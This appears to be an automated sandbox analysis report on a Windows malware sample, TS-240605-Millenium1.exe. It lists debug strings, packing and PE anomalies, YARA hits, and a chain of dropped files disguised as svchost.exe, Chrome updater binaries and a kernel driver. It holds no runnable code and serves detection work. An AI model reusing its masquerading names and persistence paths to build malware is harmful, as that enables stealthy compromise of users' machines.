                                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: TS-240605-Millenium1.exe, 00000000.00000003.1829021959.000001C002F53000.00000004.00000020.00020000.00000000.sdmp, TS-240605-Millenium1.exe, 00000002.00000002.1861085932.00007FFE1A463000.00000002.00000001.01000000.00000006.sdmp, based.exe, 00000007.00000003.1867875346.00000235B9F82000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2142359047.00007FFE1A463000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: based.exe, based.exe, 00000008.00000002.2131887023.00007FFDFAC61000.00000040.00000001.01000000.00000018.sdmp
                                  Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: based.exe, based.exe, 00000008.00000002.2129872037.00007FFDFAB71000.00000040.00000001.01000000.0000001C.sdmp
                                  Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942214372.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1930774144.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1946961098.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000016.00000003.1935382253.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: TS-240605-Millenium1.exe, 00000002.00000002.1860163508.00007FFDFB16B000.00000040.00000001.01000000.00000005.sdmp, based.exe, 00000008.00000002.2132559008.00007FFDFB16B000.00000040.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1927279052.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942062017.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1931053908.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000006.00000003.1880772946.0000024C988B5000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2140577670.00007FFE13201000.00000040.00000001.01000000.0000001A.sdmp
                                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1933749941.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1935780231.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1939007934.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000016.00000003.1930006938.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1926847028.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: based.exe
                                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: based.exe, 00000008.00000002.2140120247.00007FFE11EBC000.00000040.00000001.01000000.00000015.sdmp
                                  Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1942410950.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1931053908.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000002.2052320150.00007FFDF540E000.00000002.00000001.01000000.00000025.sdmp, main.exe, 00000015.00000002.1999999146.0000025EB80B9000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000009.00000002.1905399144.00007FFDFB9AF000.00000002.00000001.01000000.00000012.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: based.exe, 00000008.00000002.2140404120.00007FFE130C1000.00000040.00000001.01000000.0000001F.sdmp
                                  Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1933749941.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1930774144.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1942989444.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000008.00000002.2138737753.00007FFE0EB41000.00000040.00000001.01000000.00000017.sdmp
                                  Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: svchost.exe, 00000016.00000003.1935780231.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: svchost.exe, 00000016.00000003.1935382253.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: svchost.exe, 00000016.00000003.1958528101.000002C3F582E000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\libssl-3.pdb source: based.exe, based.exe, 00000008.00000002.2137558702.00007FFE007E4000.00000040.00000001.01000000.0000001D.sdmp
                                  Source: Binary string: C:\dev\sqlite\dotnet-private\bin\2015\Win32\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: s.exe, 0000000C.00000003.1905885998.000000000688D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: main.exe, 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp
                                  Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1941897050.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: based.exe, based.exe, 00000008.00000002.2138314903.00007FFE0E151000.00000040.00000001.01000000.0000001B.sdmp
                                  Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: svchost.exe, 00000016.00000003.1946961098.000002C3F582D000.00000004.00000020.00020000.00000000.sdmp
                                  Source: TS-240605-Millenium1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: TS-240605-Millenium1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: TS-240605-Millenium1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: TS-240605-Millenium1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: TS-240605-Millenium1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  barindex
                                  Source: main.exe.12.dr, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                                  Source: Update.exe.21.dr, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a3ef04.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5a30000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.main.exe.25eb5ba05b8.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000015.00000002.1999999146.0000025EB7D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000015.00000000.1914340821.0000025EB5A32000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000C.00000003.1905885998.0000000006BAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: main.exe PID: 5064, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\main.exe, type: DROPPED
                                  Source: main.exe.12.drStatic PE information: 0xEE92FC16 [Thu Nov 1 12:09:58 2096 UTC]
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeCode function: 2_2_00007FFDFB3C2F20 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFDFB3C2F20
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeFile created: C:\ProgramData\Microsoft\__tmp_rar_sfx_access_check_5594093Jump to behavior
                                  Source: _sqlite3.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xf057
                                  Source: sqlite3.dll.7.drStatic PE information: real checksum: 0x0 should be: 0xac9c9
                                  Source: _pytransform.dll.22.drStatic PE information: real checksum: 0x125b11 should be: 0x12c3c0
                                  Source: python311.dll.7.drStatic PE information: real checksum: 0x0 should be: 0x1aa7fb
                                  Source: libcrypto-3.dll.7.drStatic PE information: real checksum: 0x0 should be: 0x19efbf
                                  Source: Update.exe.21.drStatic PE information: real checksum: 0x0 should be: 0x5a6021
                                  Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x57c89
                                  Source: _queue.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xaaa4
                                  Source: _socket.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0xd687
                                  Source: _ctypes.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x1da8e
                                  Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x19efbf
                                  Source: _ssl.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x1e511
                                  Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1ebed
                                  Source: main.exe.12.drStatic PE information: real checksum: 0x0 should be: 0x5a6021
                                  Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x23865
                                  Source: unicodedata.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x57c89
                                  Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x13bf2
                                  Source: libffi-8.dll.7.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
                                  Source: _decimal.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x1ebed
                                  Source: based.exe.5.drStatic PE information: real checksum: 0x76ce9d should be: 0x76b6fa
                                  Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xd687
                                  Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x13f78
                                  Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x81b9
                                  Source: _lzma.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x23865
                                  Source: libssl-3.dll.7.drStatic PE information: real checksum: 0x0 should be: 0x3a250
                                  Source: _hashlib.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x13f78
                                  Source: setup.exe.12.drStatic PE information: real checksum: 0x55ddc3 should be: 0x56311d
                                  Source: select.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x81b9
                                  Source: _bz2.pyd.7.drStatic PE information: real checksum: 0x0 should be: 0x13bf2
                                  Source: python311.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1aa7fb
                                  Source: TS-240605-Millenium1.exeStatic PE information: section name: _RDATA
                                  Source: Build.exe.0.drStatic PE information: section name: .didat
                                  Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
                                  Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                                  Source: hacn.exe.5.drStatic PE information: section name: _RDATA
                                  Source: based.exe.5.drStatic PE information: section name: _RDATA
                                  Source: VCRUNTIME140.dll.6.drStatic PE information: section name: _RDATA
                                  Source: libcrypto-1_1.dll.6.drStatic PE information: section name: .00cfg
                                  Source: python310.dll.6.drStatic PE information: section name: PyRuntim
                                  Source: s.exe.6.drStatic PE information: section name: .didat
                                  Source: VCRUNTIME140.dll.7.drStatic PE information: section name: fothk
                                  Source: VCRUNTIME140.dll.7.drStatic PE information: section name: _RDATA
                                  Source: libffi-8.dll.7.drStatic PE information: section name: UPX2
                                  Source: setup.exe.12.drStatic PE information: section name: .xdata
                                  Source: svchost.exe.12.drStatic PE information: section name: _RDATA
                                  Source: libcrypto-1_1.dll.22.drStatic PE information: section name: .00cfg
                                  Source: libssl-1_1.dll.22.drStatic PE information: section name: .00cfg
                                  Source: python310.dll.22.drStatic PE information: section name: PyRuntim
                                  Source: VCRUNTIME140.dll.22.drStatic PE information: section name: _RDATA
                                  Source: _pytransform.dll.22.drStatic PE information: section name: .xdata
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_0038125A push ecx; ret 5_2_0038126D
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeCode function: 5_2_00381DB0 push ecx; ret 5_2_00381DC3
                                  Source: C:\ProgramData\Microsoft\hacn.exeCode function: 6_2_00007FF6477B506C push rcx; iretd 6_2_00007FF6477B506D
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB86ACDD push rcx; retf 003Fh7_2_00000235BB86ACDE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB89C6DD push rcx; retf 003Fh7_2_00000235BB89C6DE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 7_2_00000235BB8CACDD push rcx; retf 003Fh7_2_00000235BB8CACDE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB8872ACDD push rcx; retf 003Fh8_2_000001EB8872ACDE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB8875C6DD push rcx; retf 003Fh8_2_000001EB8875C6DE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_000001EB8878ACDD push rcx; retf 003Fh8_2_000001EB8878ACDE
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B5D06 push r12; ret 8_2_00007FFDFB9B5D08
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B8405 push r10; retf 8_2_00007FFDFB9B8471
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B5CFE push rdx; ret 8_2_00007FFDFB9B5D01
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B5E0F push rsp; ret 8_2_00007FFDFB9B5E17
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B930D push rsp; ret 8_2_00007FFDFB9B930E
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B5CE5 push r8; ret 8_2_00007FFDFB9B5CEB
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B7FEB push r12; ret 8_2_00007FFDFB9B8036
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B5CE0 push r10; retf 8_2_00007FFDFB9B5CE2
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B5DF7 push r10; retf 8_2_00007FFDFB9B5DFA
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B5EFA push r12; ret 8_2_00007FFDFB9B5F07
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B5E58 push rdi; iretd 8_2_00007FFDFB9B5E5A
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B5F56 push r12; ret 8_2_00007FFDFB9B5F6E
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B7F53 push rbp; iretq 8_2_00007FFDFB9B7F54
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B8F28 push rsp; iretq 8_2_00007FFDFB9B8F29
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B7630 push rbp; retf 8_2_00007FFDFB9B7649
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B5C31 push r10; ret 8_2_00007FFDFB9B5C33
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B685F push rsi; ret 8_2_00007FFDFB9B6896
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B8077 push r12; iretd 8_2_00007FFDFB9B808B
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B5F76 push r8; ret 8_2_00007FFDFB9B5F83
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B767B push r12; ret 8_2_00007FFDFB9B76BF
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B82C4 push rdi; iretd 8_2_00007FFDFB9B82C6
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB9B8DA5 push rsp; retf 8_2_00007FFDFB9B8DA6
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1
                                  Source: initial sampleStatic PE information: section name: UPX0
                                  Source: initial sampleStatic PE information: section name: UPX1

                                  Persistence and Installation Behavior

                                  barindex
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeProcess created: "C:\Users\user\Desktop\TS-240605-Millenium1.exe"
                                  Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\gqxqtdeqxchk.sys
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\_queue.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\_brotli.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\select.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\_ctypes.pydJump to dropped file
                                  Source: C:\ProgramData\main.exeFile created: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exeJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_ctypes.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\main.exeFile created: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_bz2.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78002\_hashlib.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\unicodedata.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\pyexpat.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78002\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeFile created: C:\ProgramData\Microsoft\based.exeJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\libffi-8.dllJump to dropped file
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_lzma.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\sqlite3.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78002\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\libcrypto-3.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\ucrtbase.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\python311.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\_decimal.pydJump to dropped file
                                  Source: C:\Users\user\Desktop\TS-240605-Millenium1.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\libcrypto-1_1.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\libssl-1_1.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\_pytransform.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\_cffi_backend.cp310-win_amd64.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\VCRUNTIME140.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\bcrypt\_bcrypt.pydJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\_decimal.pydJump to dropped file
                                  Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                                  Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI78122\libssl-3.dllJump to dropped file
